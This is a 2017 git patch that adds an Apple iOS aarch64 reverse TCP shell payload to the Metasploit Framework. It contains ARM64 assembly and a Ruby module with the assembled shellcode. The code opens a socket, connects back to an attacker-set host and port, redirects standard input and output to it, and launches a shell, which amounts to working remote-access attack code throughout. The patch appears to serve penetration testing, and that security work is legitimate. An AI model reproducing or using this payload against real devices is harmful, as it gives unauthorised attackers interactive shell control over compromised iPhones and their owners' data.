From 358aca943508357b852dabdab5f6ad46cb8faef4 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 19 Dec 2017 15:39:29 +0800 Subject: [PATCH] apple_ios/aarch64/shell_reverse_tcp --- .../aarch64/single_reverse_tcp_shell.s | 72 ++++++++++++++ .../apple_ios/aarch64/shell_reverse_tcp.rb | 97 +++++++++++++++++++ 2 files changed, 169 insertions(+) create mode 100644 external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s create mode 100644 modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb diff --git a/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s b/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s new file mode 100644 index 0000000000..1166d26202 --- /dev/null +++ b/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s @@ -0,0 +1,72 @@ +.equ SYS_SOCKET, 0x61 +.equ SYS_CONNECT, 0x62 +.equ SYS_DUP2, 0x5a +.equ SYS_EXECVE, 0x3b +.equ SYS_EXIT, 0x01 + +.equ AF_INET, 0x2 +.equ SOCK_STREAM, 0x1 + +.equ STDIN, 0x0 +.equ STDOUT, 0x1 +.equ STDERR, 0x2 + +.equ IP, 0x0100007f +.equ PORT, 0x5C11 + +_start: + // sockfd = socket(AF_INET, SOCK_STREAM, 0) + mov x0, AF_INET + mov x1, SOCK_STREAM + mov x2, 0 + mov x16, SYS_SOCKET + svc 0 + mov x3, x0 + + // connect(sockfd, (struct sockaddr *)&server, sockaddr_len) + adr x1, sockaddr + mov x2, 0x10 + mov x16, SYS_CONNECT + svc 0 + cbnz w0, exit + + // dup2(sockfd, STDIN) ... + mov x0, x3 + mov x2, 0 + mov x1, STDIN + mov x16, SYS_DUP2 + svc 0 + mov x1, STDOUT + mov x16, SYS_DUP2 + svc 0 + mov x1, STDERR + mov x16, SYS_DUP2 + svc 0 + + // execve('/system/bin/sh', NULL, NULL) + adr x0, shell + mov x2, 0 + str x0, [sp, 0] + str x2, [sp, 8] + mov x1, sp + mov x16, SYS_EXECVE + svc 0 + +exit: + mov x0, 0 + mov x16, SYS_EXIT + svc 0 + +.balign 4 +sockaddr: + .short AF_INET + .short PORT + .word IP + +shell: +.word 0x00000000 +.word 0x00000000 +.word 0x00000000 +.word 0x00000000 +end: + diff --git a/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb new file mode 100644 index 0000000000..7dca1d0ee2 --- /dev/null +++ b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb @@ -0,0 +1,97 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module MetasploitModule + + CachedSize = 152 + + include Msf::Payload::Single + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Apple iOS aarch64 Command Shell, Reverse TCP Inline', + 'Description' => 'Connect back to attacker and spawn a command shell', + 'License' => MSF_LICENSE, + 'Platform' => 'apple_ios', + 'Arch' => ARCH_AARCH64, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'LHOST' => [ 132, 'ADDR' ], + 'LPORT' => [ 130, 'n' ], + }, + 'Payload' => + [ + # Generated from external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s + 0xd2800040, # mov x0, #0x2 // #2 + 0xd2800021, # mov x1, #0x1 // #1 + 0xd2800002, # mov x2, #0x0 // #0 + 0xd2800c30, # mov x16, #0x61 // #97 + 0xd4000001, # svc #0x0 + 0xaa0003e3, # mov x3, x0 + 0x10000341, # adr x1, 80 + 0xd2800202, # mov x2, #0x10 // #16 + 0xd2800c50, # mov x16, #0x62 // #98 + 0xd4000001, # svc #0x0 + 0x35000260, # cbnz w0, 74 + 0xaa0303e0, # mov x0, x3 + 0xd2800002, # mov x2, #0x0 // #0 + 0xd2800001, # mov x1, #0x0 // #0 + 0xd2800b50, # mov x16, #0x5a // #90 + 0xd4000001, # svc #0x0 + 0xd2800021, # mov x1, #0x1 // #1 + 0xd2800b50, # mov x16, #0x5a // #90 + 0xd4000001, # svc #0x0 + 0xd2800041, # mov x1, #0x2 // #2 + 0xd2800b50, # mov x16, #0x5a // #90 + 0xd4000001, # svc #0x0 + 0x10000180, # adr x0, 88 + 0xd2800002, # mov x2, #0x0 // #0 + 0xf90003e0, # str x0, [sp] + 0xf90007e2, # str x2, [sp,#8] + 0x910003e1, # mov x1, sp + 0xd2800770, # mov x16, #0x3b // #59 + 0xd4000001, # svc #0x0 + 0xd2800000, # mov x0, #0x0 // #0 + 0xd2800030, # mov x16, #0x1 // #1 + 0xd4000001, # svc #0x0 + 0x5c110002, # .word 0x5c110002 + 0x0100007f, # .word 0x0100007f + 0x00000000, # .word 0x00000000 // shell + 0x00000000, # .word 0x00000000 + 0x00000000, # .word 0x00000000 + 0x00000000, # .word 0x00000000 + ].pack("V*") + } + )) + + # Register command execution options + register_options( + [ + OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]), + ]) + end + + def generate + p = super + + sh = datastore['SHELL'] + if sh.length >= 16 + raise ArgumentError, "The specified shell must be less than 16 bytes." + end + p[136, sh.length] = sh + + p + end +end